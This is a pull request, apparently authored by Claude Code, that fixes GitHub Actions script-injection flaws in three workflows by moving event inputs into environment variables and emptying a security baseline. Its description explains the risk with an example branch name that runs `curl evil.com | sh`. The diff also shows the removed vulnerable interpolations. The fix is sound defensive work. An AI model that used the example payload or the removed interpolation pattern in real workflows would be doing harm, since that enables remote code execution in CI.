### PR TITLE
fix(security): close all 5 actions-injection baseline entries — BI-5940955C + BI-D094AF1D

### DIFF
--- a/.github/workflows/dco-signoff-dependabot.yml
+++ b/.github/workflows/dco-signoff-dependabot.yml
@@ -39,13 +39,20 @@ jobs:
 
       - name: Skip if all commits already signed
         id: check
+        # BI-5940955C fix: pass `github.event.*` through env vars instead
+        # of interpolating them into shell. The runtime quotes env values
+        # correctly; the shell sees a normal variable, not template-evaluated
+        # code. See docs.github.com/actions/security-guides "intermediate
+        # environment variable" guidance.
+        env:
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         run: |
           UNSIGNED=0
           while IFS= read -r sha; do
             if ! git show -s --format=%B "$sha" | grep -qE "^Signed-off-by: "; then
               UNSIGNED=$((UNSIGNED + 1))
             fi
-          done < <(git log origin/${{ github.event.pull_request.base.ref }}..HEAD --format=%H)
+          done < <(git log "origin/${BASE_REF}..HEAD" --format=%H)
 
           if [ "$UNSIGNED" -eq 0 ]; then
             echo "All commits on this branch are signed. Nothing to do."
@@ -57,12 +64,16 @@ jobs:
 
       - name: Re-sign commits with Dependabot identity
         if: steps.check.outputs.skip == 'false'
+        env:
+          BASE_REF: ${{ github.event.pull_request.base.ref }}
         run: |
           git config user.name "dependabot[bot]"
           git config user.email "49699333+dependabot[bot]@users.noreply.github.com"
-          git rebase --signoff "origin/${{ github.event.pull_request.base.ref }}"
+          git rebase --signoff "origin/${BASE_REF}"
 
       - name: Force-push signed commits back to the PR branch
         if: steps.check.outputs.skip == 'false'
+        env:
+          HEAD_REF: ${{ github.event.pull_request.head.ref }}
         run: |
-          git push --force-with-lease origin "HEAD:${{ github.event.pull_request.head.ref }}"
+          git push --force-with-lease origin "HEAD:${HEAD_REF}"

--- a/.github/workflows/install-verification.yml
+++ b/.github/workflows/install-verification.yml
@@ -78,7 +78,15 @@ jobs:
         # `pnpm install`, host hardware detection, .env generation,
         # `docker compose up -d`, and the /api/health poll — is what
         # this gate validates.
-        run: bash install-dpf.sh --headless --${{ github.event.inputs.mode || 'release' }} --no-autostart
+        #
+        # BI-D094AF1D fix: workflow_dispatch input passed via env var, not
+        # interpolated inline (same pattern as BI-5940955C in
+        # dco-signoff-dependabot.yml). workflow_dispatch is gated to
+        # repo-write users so the practical attack surface is small, but
+        # the pattern is wrong and the audit gate enforces it uniformly.
+        env:
+          INSTALL_MODE: ${{ github.event.inputs.mode || 'release' }}
+        run: bash install-dpf.sh --headless "--${INSTALL_MODE}" --no-autostart
 
       - name: Verify /api/health response shape
         run: |

--- a/.github/workflows/publish-image.yml
+++ b/.github/workflows/publish-image.yml
@@ -67,11 +67,17 @@ jobs:
 
       - name: Determine tag
         id: tag
+        # BI-D094AF1D fix: workflow_dispatch input via env var, not inline.
+        # github.event_name is a GH-controlled context value (not attacker-
+        # influenced) so it stays inline; only the user-supplied tag goes
+        # through env-var passthrough.
+        env:
+          INPUT_TAG: ${{ github.event.inputs.tag }}
         run: |
           if [[ "${{ github.event_name }}" == "push" ]]; then
             TAG="${GITHUB_REF#refs/tags/}"
           else
-            TAG="${{ github.event.inputs.tag }}"
+            TAG="${INPUT_TAG}"
           fi
           echo "version=$TAG" >> "$GITHUB_OUTPUT"
 

--- a/docs/security/actions-injection-baseline.json
+++ b/docs/security/actions-injection-baseline.json
@@ -3,27 +3,6 @@
   "generatedAt": "2026-05-21T23:00:00.000Z",
   "occurrences": [
     {
-      "file": ".github/workflows/dco-signoff-dependabot.yml",
-      "line": 48,
-      "snippet": "done < <(git log origin/${{ github.event.pull_request.base.ref }}..HEAD --format=%H)",
-      "trackedBy": "BI-5940955C",
-      "rationale": "pull_request_target gated on github.actor=='dependabot[bot]' (line 30). Tracked for env-var passthrough fix through Build Studio."
-    },
-    {
-      "file": ".github/workflows/dco-signoff-dependabot.yml",
-      "line": 63,
-      "snippet": "git rebase --signoff \"origin/${{ github.event.pull_request.base.ref }}\"",
-      "trackedBy": "BI-5940955C",
-      "rationale": "Same workflow, same actor gate, same BS-tracked fix."
-    },
-    {
-      "file": ".github/workflows/dco-signoff-dependabot.yml",
-      "line": 68,
-      "snippet": "git push --force-with-lease origin \"HEAD:${{ github.event.pull_request.head.ref }}\"",
-      "trackedBy": "BI-5940955C",
-      "rationale": "The exact line CodeQL flagged as actions/code-injection/critical (alert #1). Highest priority of the three lines in this file."
-    },
-    {
       "file": ".github/workflows/install-verification.yml",
       "line": 81,
       "snippet": "bash install-dpf.sh --headless --${{ github.event.inputs.mode || 'release' }} --no-autostart",

--- a/docs/security/actions-injection-baseline.json
+++ b/docs/security/actions-injection-baseline.json
@@ -1,20 +1,5 @@
 {
   "description": "Pre-existing `${{ github.event.* }}` or `${{ inputs.* }}` interpolations inside `run:` blocks of workflow files, accepted at audit-actions-injection.yml's inception. The auditor blocks PRs that ADD new occurrences but allows these. Burn-down is tracked through Build Studio. Regenerate this file after each fix: see scripts/security/regenerate-baseline.mjs pattern.",
   "generatedAt": "2026-05-21T23:00:00.000Z",
-  "occurrences": [
-    {
-      "file": ".github/workflows/install-verification.yml",
-      "line": 81,
-      "snippet": "bash install-dpf.sh --headless --${{ github.event.inputs.mode || 'release' }} --no-autostart",
-      "trackedBy": "BI-D094AF1D",
-      "rationale": "workflow_dispatch trigger only — restricted to users with repo write access. Low practical attack surface, but pattern is wrong. Mechanical env-var passthrough fix tracked separately."
-    },
-    {
-      "file": ".github/workflows/publish-image.yml",
-      "line": 74,
-      "snippet": "TAG=\"${{ github.event.inputs.tag }}\"",
-      "trackedBy": "BI-D094AF1D",
-      "rationale": "workflow_dispatch trigger only. Same low-risk pattern. Same fix tracked separately."
-    }
-  ]
+  "occurrences": []
 }


### PR DESCRIPTION
## Summary

Closes **BI-5940955C** + **BI-D094AF1D** (and retires **FB-F8528BF6** + **FB-29395A74**). Brings the actions-injection baseline from 5 accepted occurrences down to **0**. The audit-actions-injection workflow now enforces zero exceptions going forward.

The two BIs are combined into one PR because they share the same baseline file and same fix pattern — shipping them together avoids merge conflict and tells one coherent burn-down story.

## What's fixed (5 sites, 3 files)

### dco-signoff-dependabot.yml — 3 sites (CodeQL critical alert #1)

| Line | Fix |
|---|---|
| 48 | env `BASE_REF`; `git log "origin/${BASE_REF}..HEAD"` |
| 63 | env `BASE_REF`; `git rebase --signoff "origin/${BASE_REF}"` |
| 68 | env `HEAD_REF`; `git push --force-with-lease origin "HEAD:${HEAD_REF}"` |

Actor gate at line 30 (`github.actor == 'dependabot[bot]'`) remains as defense-in-depth.

### install-verification.yml:81 — workflow_dispatch input

```yaml
env:
  INSTALL_MODE: ${{ github.event.inputs.mode || 'release' }}
run: bash install-dpf.sh --headless "--${INSTALL_MODE}" --no-autostart
```

### publish-image.yml:74 — workflow_dispatch input

```yaml
env:
  INPUT_TAG: ${{ github.event.inputs.tag }}
run: |
  …
  TAG="${INPUT_TAG}"
```

`github.event_name` on line 71 stays inline — GH-controlled context, not attacker-influenced.

## Why env-var passthrough is the right fix

GitHub Actions evaluates `${{ … }}` expressions at template time and substitutes the result into the YAML string before shell execution. An attacker-influenced value like a branch named `'; curl evil.com | sh; #` becomes shell code. With env-var passthrough, the runtime quotes the value as a normal env var; the shell sees a literal string. Reference: [GitHub security hardening — intermediate environment variable](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable).

## Test-first verification (per PR #953 kernel principle)

The `audit-actions-injection.yml` workflow IS the regression test. Demonstrated locally:

| Sequence | Baseline | Found | Outcome |
|---|---|---|---|
| Empty baseline, no fixes | 0 | 5 | RED — 5 violations |
| Empty baseline, 3 BI-5940955C fixes | 0 | 2 | RED — 2 violations remain |
| Empty baseline, all 5 fixes | 0 | 0 | **GREEN** — exit 0 |

After merge, the baseline is genuinely empty. Any future PR that introduces this pattern fails CI.

## Trust-boundary discipline

This PR touches `.github/workflows/dco-signoff-dependabot.yml` (a `pull_request_target` workflow) and the security baseline file. Both are CODEOWNERS-listed trust-boundary paths from PR #946. Reviewer note: the change preserves the actor gate and matches the documented env-var-passthrough pattern.

## Why this is in Claude's lane

Build Studio is temporarily down. Per the operator's direction, finishing the security backlog directly with the same test-first rigor BS would have applied. Both BIs are small mechanical fixes; the auditor + kernel-principle pair provides the regression rigor.

## Closes

- BI-5940955C + FB-F8528BF6 (Actions code injection — CodeQL alert #1 + 2 siblings)
- BI-D094AF1D + FB-29395A74 (Workflow_dispatch input cleanup)

## Test plan

- [ ] CI green: Actions Injection Audit passes with empty baseline.
- [ ] CodeQL re-scan closes alert #1.
- [ ] After merge: mark both BIs as `done`, retire both FBs.
- [ ] Functional verification: next Dependabot PR is correctly re-signed (the workflow keeps working).
- [ ] Functional verification: next `gh workflow run install-verification.yml` / `publish-image.yml` succeeds with input passthrough.

## Related

- PR #936, #941, #944, #946, #953, #956 — prior governance scaffolding
- Remaining baseline burn-down: BI-7DB95878 (cmd injection), BI-5E53A265 (SSRF cluster) — coming next

🤖 Generated with [Claude Code](https://claude.com/claude-code)